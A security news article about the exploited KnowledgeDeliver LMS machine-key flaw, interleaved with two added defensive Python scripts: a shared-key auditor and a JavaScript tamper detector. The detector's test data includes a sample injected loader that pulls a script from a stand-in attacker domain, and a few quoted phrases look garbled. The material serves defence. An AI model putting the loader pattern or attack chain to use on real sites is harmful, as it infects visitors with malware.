
KnowledgeDeliver LMS Flaw Used to Deliver Godzilla Web Shell and Cobalt Strike

Ravie Lakshmanan | May 26, 2026 | Vulnerability / Threat Intelligence

A now-patched high-severity security flaw affecting Digital Knowledge KnowledgeDeliver, a popular Learning Management System (LMS) in Japan, was used as a zero-day to deliver the Godzilla web shell and ultimately facilitate the deployment of the Cobalt Strike Beacon.

The vulnerability, tracked as CVE-2026-5426 (CVSS score: 7.5), stems from the use of hard-coded ASP.NET machine keys, which enables unauthenticated remote code execution through ViewState deserialization attacks. Exploitation of publicly exposed ASP.NET machine keys by malicious actors was first documented by Microsoft in February 2025.

“An unknown malicious actor used this access to inject malicious code into the LMS site, with the aim of infecting users visiting the site,” said Google Mandiant and the Google Threat Intelligence Group (GTIG).

The flaw affects Digital Knowledge KnowledgeDeliver installations prior to February 24, 2026. It is worth noting that similar machine-key vulnerabilities in Sitecore Experience Manager (XM) and in Gladinet CenterStack and TrioFox have also been exploited by threat actors.

The root cause is that a KnowledgeDeliver installation relies on a default web.config file supplied by the vendor that contains hard-coded machineKey values. The ASP.NET framework uses these keys for data signing and encryption, including the protection of ViewState.

As a result, a threat actor who obtains the keys from a single installation can reuse them to compromise any other internet-facing KnowledgeDeliver instance that ships with the same default.

“ASP.NET ViewState persists the page state across all background objects,” says Google. “When the machineKey is known, a threat actor can execute a malicious ViewState payload. By sending this payload in an HTTP request (with the __VIEWSTATE parameter), a threat actor can make the server lose it.”
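Because the weakness is a secret shared across every deployment, the defensive check is to find installs whose web.config carries a literal machineKey and, in particular, installs that share the same key material. The following Python script is an added example, not code from the article, Google, or Digital Knowledge: the web.config snippets, file paths and key strings are constructed for illustration and are not the vendor's real values. It parses each config, flags any literal validationKey/decryptionKey (as opposed to AutoGenerate,IsolateApps), and groups installs by a fingerprint of the key pair so that shared secrets surface without the report printing the secret itself.

```python
"""Audit ASP.NET web.config files for hard-coded or shared <machineKey> values.

Added example; not code from the article, Google, or the LMS vendor.
All paths, XML snippets and key strings below are constructed placeholders.
"""
import hashlib
import xml.etree.ElementTree as ET
from collections import defaultdict
from typing import Dict, List, Optional

# Constructed sample: two installs shipped with an identical vendor default key
# (the risky pattern described in the article) and one install using
# auto-generated, per-application keys (the safe setting).
SHARED_KEY_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="FEDCBA9876543210FEDCBA9876543210"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""

SAFE_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""

SAMPLE_CONFIGS = {
    r"C:\inetpub\lms-site-a\web.config": SHARED_KEY_CONFIG,
    r"C:\inetpub\lms-site-b\web.config": SHARED_KEY_CONFIG,
    r"C:\inetpub\lms-site-c\web.config": SAFE_CONFIG,
}


def extract_machine_key(config_xml: str) -> Optional[Dict[str, str]]:
    """Return the <machineKey> attributes, or None when the element is absent
    (absent means ASP.NET falls back to auto-generated keys)."""
    root = ET.fromstring(config_xml)
    node = next(root.iter("machineKey"), None)
    return None if node is None else dict(node.attrib)


def is_hardcoded(attrs: Optional[Dict[str, str]]) -> bool:
    """A key is hard-coded when either attribute is a literal value rather than
    AutoGenerate. A literal key in a vendor-shipped default is a shared secret."""
    if attrs is None:
        return False
    for name in ("validationKey", "decryptionKey"):
        value = attrs.get(name, "AutoGenerate")
        if not value.strip().upper().startswith("AUTOGENERATE"):
            return True
    return False


def audit(configs: Dict[str, str]) -> Dict[str, object]:
    """Classify each config and group hard-coded installs by a key fingerprint
    so that installs sharing one secret are reported together."""
    findings: Dict[str, object] = {"hardcoded": [], "auto": [], "shared_groups": {}}
    by_fingerprint: Dict[str, List[str]] = defaultdict(list)
    for path, xml in configs.items():
        attrs = extract_machine_key(xml)
        if is_hardcoded(attrs):
            # Fingerprint the key pair; the report never needs the raw secret.
            material = (attrs.get("validationKey", "") + "|" + attrs.get("decryptionKey", "")).encode()
            fp = hashlib.sha256(material).hexdigest()[:16]
            findings["hardcoded"].append(path)
            by_fingerprint[fp].append(path)
        else:
            findings["auto"].append(path)
    findings["shared_groups"] = {fp: p for fp, p in by_fingerprint.items() if len(p) > 1}
    return findings


if __name__ == "__main__":
    report = audit(SAMPLE_CONFIGS)
    for path in report["hardcoded"]:
        print(f"[!] hard-coded machineKey: {path}")
    for fp, paths in report["shared_groups"].items():
        print(f"[!!] key fingerprint {fp} shared by {len(paths)} installs: {', '.join(paths)}")
    for path in report["auto"]:
        print(f"[ok] auto-generated keys: {path}")
```

In a real fleet the `SAMPLE_CONFIGS` dictionary would be replaced by reading each site's web.config from disk; the fingerprint grouping is what turns "this install has a literal key" into the more urgent "these N installs share one key", which is exactly the condition that let a single leaked key threaten every KnowledgeDeliver deployment.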

In the observed activity related to CVE-2026-5426, attackers were found using the Godzilla (aka BLUEBEAM) web shell, giving them the ability to execute commands or download additional payloads.

Among the commands issued were ones that broadened the attacker's control over the web server's file system by granting “Everyone” full access to the web application's directory. The threat actor then tampered with the application's JavaScript file to insert code that displayed a fake security warning urging users to install a “security verification plugin.”

This unauthorized modification allowed the page to covertly load a malicious script hosted on an attacker-controlled domain. That script, in turn, convinced users to download a fake installer, ultimately infecting their machines with Cobalt Strike Beacon.
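The JavaScript tampering described above is detectable on the server side with two simple checks: a hash baseline for the application's static files, and a scan of those files for script loaders that reference hosts outside the application's own origins. The following Python script is an added example, not code from the article or any vendor; the file name, baseline, allowlist, and the injected loader (including the `example-attacker.invalid` domain) are constructed placeholders, not indicators from the incident.

```python
"""Detect tampering of a web application's static JavaScript, such as an
injected loader that pulls a script from a foreign domain.

Added example; not code from the article or any vendor. File names, baseline,
allowlist and the injected snippet are constructed for illustration.
"""
import hashlib
import re
from typing import Dict, List, Set

# Constructed known-good file captured when the application was deployed.
ORIGINAL_JS = b"(function(){ window.lms = { init: function(){ console.log('ready'); } }; })();\n"

# Constructed tampered version: the original code plus an injected loader that
# fetches a script from a host outside the application's origins.
TAMPERED_JS = ORIGINAL_JS + (
    b"var s=document.createElement('script');"
    b"s.src='https://cdn.example-attacker.invalid/verify.js';"
    b"document.head.appendChild(s);\n"
)

# Baseline of SHA-256 hashes recorded at deployment time (constructed).
BASELINE = {"scripts/app.js": hashlib.sha256(ORIGINAL_JS).hexdigest()}
# Hosts the application legitimately loads scripts from (constructed).
ALLOWED_SCRIPT_HOSTS = {"lms.example.invalid", "static.example.invalid"}

URL_RE = re.compile(rb"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
LOADER_RE = re.compile(
    rb"createElement\(\s*['\"]script['\"]\s*\)|<script[^>]+src=", re.IGNORECASE
)


def hash_mismatch(path: str, content: bytes, baseline: Dict[str, str]) -> bool:
    """True when the file's current hash differs from the recorded baseline
    (a file missing from the baseline is treated as modified)."""
    expected = baseline.get(path)
    return expected is None or hashlib.sha256(content).hexdigest() != expected


def foreign_script_hosts(content: bytes, allowed: Set[str]) -> List[str]:
    """Return URL hosts referenced in the file that are not on the allowlist."""
    hosts = {m.group(1).decode("ascii", "replace").lower() for m in URL_RE.finditer(content)}
    return sorted(h for h in hosts if h not in allowed)


def has_dynamic_loader(content: bytes) -> bool:
    """True when the file creates <script> elements or embeds script src tags."""
    return LOADER_RE.search(content) is not None


def scan(files: Dict[str, bytes], baseline: Dict[str, str], allowed: Set[str]) -> Dict[str, dict]:
    """Combine the three signals per file. A file is flagged suspicious when it
    has changed from the baseline AND it now references a foreign host or
    contains a dynamic loader."""
    results: Dict[str, dict] = {}
    for path, content in files.items():
        modified = hash_mismatch(path, content, baseline)
        foreign = foreign_script_hosts(content, allowed)
        loader = has_dynamic_loader(content)
        results[path] = {
            "modified": modified,
            "foreign_hosts": foreign,
            "dynamic_loader": loader,
            "suspicious": modified and (bool(foreign) or loader),
        }
    return results


if __name__ == "__main__":
    for label, blob in (("clean", ORIGINAL_JS), ("tampered", TAMPERED_JS)):
        result = scan({"scripts/app.js": blob}, BASELINE, ALLOWED_SCRIPT_HOSTS)["scripts/app.js"]
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{label:9s} modified={result['modified']} foreign={result['foreign_hosts']} -> {flag}")
```

Hash mismatch alone would also fire on legitimate deployments, which is why the script only escalates when a change coincides with a new external host or a dynamic loader; in practice the baseline is refreshed as part of the deployment pipeline and the scan runs on a schedule, so an edit made through a web shell outside that pipeline stands out.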

“The payload was encrypted using a key that used the name of the vulnerable organization, indicating that the threat actor prepared this payload specifically for the target organization,” Google said.

“The KnowledgeDeliver exploit highlights the serious risks of using shared secrets in deployment models. A single leaked key can compromise an entire ecosystem of installations. By using unique secrets and strong endpoint monitoring, organizations can protect themselves from this dumping attack.”
